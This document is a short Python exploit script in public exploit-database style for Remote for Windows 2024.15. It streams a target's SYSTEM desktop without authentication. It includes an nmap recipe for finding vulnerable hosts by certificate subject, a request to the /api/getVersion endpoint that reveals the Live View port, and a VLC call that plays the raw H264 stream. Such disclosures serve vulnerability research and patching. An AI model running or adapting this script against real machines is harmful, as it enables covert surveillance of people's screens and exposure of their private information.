# Exploit Title: Remote for Windows 2024.15 - Unauthenticated SYSTEM
Desktop Stream Exploit
# Date: 2025-05-19
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)
#!/usr/bin/env python3

'''
Remote for Windows 2024.15 - Unauthenticated SYSTEM Desktop Stream Exploit
Vulnerable Component: Helper app Live View feature (raw H264 over TCP)
Live View H264 per default is enabled.

# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''

import requests, subprocess, urllib3, sys
urllib3.disable_warnings()

def p(s):
    try:
        i,p=s.split(':'); return i, int(p)
    except:
        print("Usage: python live.py <IP:PORT>"); sys.exit(1)

def port(i,pt):
    try:
        r=requests.get(f"https://{i}:{pt}/api/getVersion",
headers={"X-LiveView":"fixed"}, verify=0, timeout=5)
        return r.json().get('liveview.port')
    except:
        return None

def vlc(i,p):
    subprocess.Popen(['vlc', f'tcp://{i}:{p}', '--demux=h264',
'--no-video-title-show', '--quiet'])

if __name__ == "__main__":
    if len(sys.argv)!=2: print("Usage: python live.py <IP:PORT>");
sys.exit()
    i,pt = p(sys.argv[1])
    if (lp:=port(i,pt)): vlc(i,lp)
    else: print("Error: No LiveView port")